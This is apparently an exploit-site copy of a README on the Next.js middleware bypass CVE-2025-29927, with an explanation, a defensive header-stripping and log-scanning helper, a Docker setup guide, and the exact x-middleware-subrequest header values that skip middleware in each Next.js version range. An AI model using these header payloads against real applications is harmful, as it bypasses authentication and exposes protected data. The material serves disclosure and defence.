## https://sploitus.com/exploit?id=F39F21A4-600F-53DE-B873-F029A87A800C
# CVE-2025-29927


![Image](https://github.com/user-attachments/assets/b3073493-1abc-4770-a3b5-5be6ebbf6175)


## CVE-2025-29927 Vulnerability

All versions of Next.js from 11.1.4 through 13.5.6, 14.x before 14.2.25, and 15.x before 15.2.3 are affected by this vulnerability. The impact is particularly significant for applications that rely on middleware for implementing access controls, as attackers can gain unauthorized access to protected resources without authentication.

### The vulnerability mechanism

The vulnerability in CVE-2025-29927 stems from a design flaw in how Next.js processes the `x-middleware-subrequest` header. This header was originally intended for internal use within the Next.js framework to prevent infinite middleware execution loops.

When a Next.js application uses middleware, the `runMiddleware` function is called to process incoming requests. As part of its functionality, this function checks for the presence of the `x-middleware-subrequest` header. If this header exists and contains a specific value, the middleware execution is skipped entirely, and the request is forwarded directly to its original destination via `NextResponse.next()`.

The flaw is that nothing stops an external client from supplying this header. By adding `x-middleware-subrequest` with the expected value to a request, an attacker bypasses any middleware-based protection mechanism entirely.
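The same header check seen from the defender's side, as an added example that is not code from the original repository or from Next.js: a Node.js helper that flags external requests carrying `x-middleware-subrequest`, recognizes the value shapes listed later on this page, and strips the header before a request is forwarded to the origin (the helper names and the sample log records are assumptions).

```javascript
// Added example (not from the original repository or Next.js itself):
// flag and strip x-middleware-subrequest on requests arriving from outside.
// Function names and the sample log records below are constructed.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';
// Value shapes the page lists: pages/<dirs>/_middleware (pre-12.2),
// middleware or src/middleware (12.2+), and for 13.2+ that name repeated,
// joined with ':'.
const SEGMENT = /^(?:pages\/(?:[^:]*\/)?_middleware|(?:src\/)?middleware)$/;

// Header names are case-insensitive; Node lowercases them, raw logs may not.
function findSubrequestHeader(headers) {
  const hit = Object.entries(headers).find(([n]) => n.toLowerCase() === SUBREQUEST_HEADER);
  return hit ? String(hit[1]) : null;
}

// Any external request carrying the header is suspicious; also report
// whether the value matches a known bypass shape and its ':' depth.
function classifyRequest(headers) {
  const value = findSubrequestHeader(headers);
  if (value === null) return { suspicious: false };
  const parts = value.split(':');
  return {
    suspicious: true,
    value,
    depth: parts.length,
    knownPayload: parts.every((p) => SEGMENT.test(p)),
  };
}

// Drop the header before forwarding to the Next.js origin, so only the
// framework's own internal subrequests can ever present it.
function sanitizeHeaders(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([n]) => n.toLowerCase() !== SUBREQUEST_HEADER),
  );
}

// Constructed sample access-log records (JSON lines) to scan offline.
const SAMPLE_LOG = [
  '{"ip":"203.0.113.5","path":"/dashboard","headers":{"x-middleware-subrequest":"middleware:middleware:middleware:middleware:middleware"}}',
  '{"ip":"198.51.100.7","path":"/","headers":{"accept":"text/html"}}',
  '{"ip":"203.0.113.9","path":"/admin","headers":{"X-Middleware-Subrequest":"src/middleware"}}',
];

// Return only the suspicious records, with their classification attached.
function scanLog(lines) {
  return lines.map((l) => JSON.parse(l))
    .map((rec) => ({ ip: rec.ip, path: rec.path, ...classifyRequest(rec.headers) }))
    .filter((rec) => rec.suspicious);
}
```

In a reverse proxy in front of the application, `sanitizeHeaders` is applied to every inbound request and `classifyRequest` feeds the alerting pipeline; a patched Next.js still benefits from the alert, since the header has no legitimate reason to arrive from outside.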

## Project Setup Guide

1.  Clone the repository:

    ```bash
    git clone <repository_url>
    ```

2.  Navigate to the project directory:

    ```bash
    cd nextjs-docker-app
    ```

3.  Build the Docker image:

    ```bash
    docker build -t nextjs-app .
    ```

4.  Run the Docker container:

    ```bash
    docker run -p 3000:3000 nextjs-app
    ```

5.  Access the application in your browser at `http://localhost:3000`.


### Exploitation Across Different Next.js Versions

The exploitation method varies slightly depending on the Next.js version:

#### For versions prior to 12.2:

In these versions, middleware files had to be named `_middleware.ts` and placed inside the `pages` folder. The value of `middlewareInfo.name` was composed of the directory name and the file name:

```cli
x-middleware-subrequest: pages/_middleware
```

For nested routes, there could be multiple middleware files at different levels, resulting in multiple possible values for the header:

```cli
x-middleware-subrequest: pages/dashboard/_middleware
```

or

```cli
x-middleware-subrequest: pages/dashboard/panel/_middleware
```

#### For versions 12.2 and later:

Starting with version 12.2, Next.js changed the middleware conventions. The file should be named `middleware.ts` (without the underscore) and should no longer be located in the `pages` folder. For these versions, the payload is simpler:

```cli
x-middleware-subrequest: middleware
```

Additionally, Next.js allows for an alternative project structure with a `/src` directory. In such cases, the payload would be:

```cli
x-middleware-subrequest: src/middleware
```

#### For versions 13.2.0 and later:

For versions 13.2.0 and above, Next.js introduced a maximum recursion depth for middleware execution. This was implemented to prevent infinite loops but doesn't affect the vulnerability. The exploitation remains the same, as the header check occurs before any recursion depth checks.

```cli
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

Alternatively, for projects using a `/src` directory structure:

```cli
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:sr
```